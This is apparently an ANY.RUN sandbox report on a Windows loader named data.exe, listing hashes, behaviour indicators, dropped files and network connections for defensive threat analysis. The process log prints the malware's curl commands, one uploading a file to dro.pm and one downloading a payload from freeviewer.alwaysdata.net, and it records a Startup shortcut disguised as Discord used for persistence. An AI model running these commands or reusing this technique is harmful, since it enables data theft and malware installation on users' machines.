File name:

data.exe

Full analysis: https://app.any.run/tasks/82fe3399-edd7-4c19-9cdd-6deaa3da6474
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 16, 2025, 22:16:07
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
auto-startup
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

87D310B74D13FF2540056557FC92C6F1

SHA1:

3E9E8A15DC7AD259A36E1497C6B1664DB1E19919

SHA256:

8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26

SSDEEP:

98304:RNJMIxgSvzG4lHdmwpZ0cuNKOUUUmes0qh54C80mmXD+UZibGlqXnz0RZKIFfeUB:xOU7m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • data.exe (PID: 2236)

    • Executing a file with an untrusted certificate

      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)

    • Reads security settings of Internet Explorer

      • data.exe (PID: 2236)

    • Executing commands from a ".bat" file

      • data.exe (PID: 2236)

    • Starts CMD.EXE for commands execution

      • data.exe (PID: 2236)

    • There is functionality for taking screenshot (YARA)

      • data.exe (PID: 2236)

    • The executable file from the user directory is run by the CMD process

      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)

    • Process requests binary or script from the Internet

      • curl.exe (PID: 7020)

    • Potential Corporate Privacy Violation

      • curl.exe (PID: 7020)

  • INFO

    • The sample compiled with english language support

      • data.exe (PID: 2236)

    • Create files in a temporary directory

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)

    • Reads the computer name

      • data.exe (PID: 2236)
      • curl.exe (PID: 5072)
      • curl.exe (PID: 7020)

    • Auto-launch of the file from Startup directory

      • data.exe (PID: 2236)

    • Creates files or folders in the user directory

      • data.exe (PID: 2236)

    • Process checks computer location settings

      • data.exe (PID: 2236)

    • Checks supported languages

      • data.exe (PID: 2236)
      • curl.exe (PID: 7020)
      • curl.exe (PID: 5072)

    • Execution of CURL command

      • cmd.exe (PID: 2692)

    • Checks proxy server information

      • slui.exe (PID: 4920)

    • Reads the software policy settings

      • slui.exe (PID: 4920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:20 10:01:22+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.42
CodeSize: 248320
InitializedDataSize: 174080
UninitializedDataSize: -
EntryPoint: 0x26540
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
126
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start data.exe cmd.exe no specs conhost.exe no specs curl.exe curl.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2236"C:\Users\admin\Desktop\data.exe" C:\Users\admin\Desktop\data.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\data.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
2692C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\RarSFX0\script.bat" "C:\Windows\SysWOW64\cmd.exedata.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4740\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4920C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5072curl -sA cli -F f=@data.exe https://dro.pm/fileman.phpC:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
60
Version:
8.12.1
Modules
Images
c:\users\admin\appdata\local\temp\rarsfx0\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\user32.dll
7020curl http://freeviewer.alwaysdata.net/data.exe --output data.exe --silentC:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.12.1
Modules
Images
c:\users\admin\appdata\local\temp\rarsfx0\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\user32.dll
Total events
4 314
Read events
4 314
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.deftext
MD5:FD1FA95AC2FBBD4D3CF7A91CD46BCD95
SHA256:FC8449996B7661B9AE9C0ED67C847F1C7241A9EF3DB717A5D578012F34FB00DA
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\curl.exeexecutable
MD5:CB023D965BF72E5FEBAE7AC8E48DD136
SHA256:FBBBC793282F35D24C22A52BB8F66E42705B8473B046EA6D1C9DEF602FB3E707
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\libcurl-x64.dllexecutable
MD5:3B3350CEAC1A9296CF396E10D8166761
SHA256:F49E0F2AA68B7F0F5EAC0B17526A61A5C388CC1C45703182524270282EECA135
7020curl.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\data.exeexecutable
MD5:87D310B74D13FF2540056557FC92C6F1
SHA256:8DD4D2DCC0A7E85D02D812C710B5256F803AC2E2123AA4AF1787F5027EF17F26
2236data.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnkbinary
MD5:5C5C2271E87586BC6DEC2A1441C1E20D
SHA256:9B0AB149036AD7056A4E5CC7407033FBB97BF7EEC819A30D11D2B436EE56F297
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\script.battext
MD5:DE985AE000038B92D0DFEAD8F92DF43C
SHA256:30E0178DD59A5EF8A63A6AF28F050EBBBB13215F81EA8D2F0DF70240B0F988D0
2236data.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\curl-ca-bundle.crttext
MD5:1A7DE82BB9F0FCC779CA18A7A9310898
SHA256:50A6277EC69113F00C5FD45F09E8B97A4B3E32DAA35D3A95AB30137A55386CEF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
44
DNS requests
16
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7020
curl.exe
GET
200
185.31.40.17:80
http://freeviewer.alwaysdata.net/data.exe
unknown
unknown
1280
SIHClient.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
1280
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7020
curl.exe
185.31.40.17:80
freeviewer.alwaysdata.net
Alwaysdata Sarl
FR
unknown
5072
curl.exe
86.80.32.182:443
dro.pm
KPN B.V.
NL
unknown
1280
SIHClient.exe
172.202.163.200:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
1280
SIHClient.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1280
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.249
whitelisted
freeviewer.alwaysdata.net
  • 185.31.40.17
unknown
dro.pm
  • 86.80.32.182
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.181
  • 23.48.23.190
  • 23.48.23.161
  • 23.48.23.191
  • 23.48.23.158
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.185
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
7020
curl.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
data.exe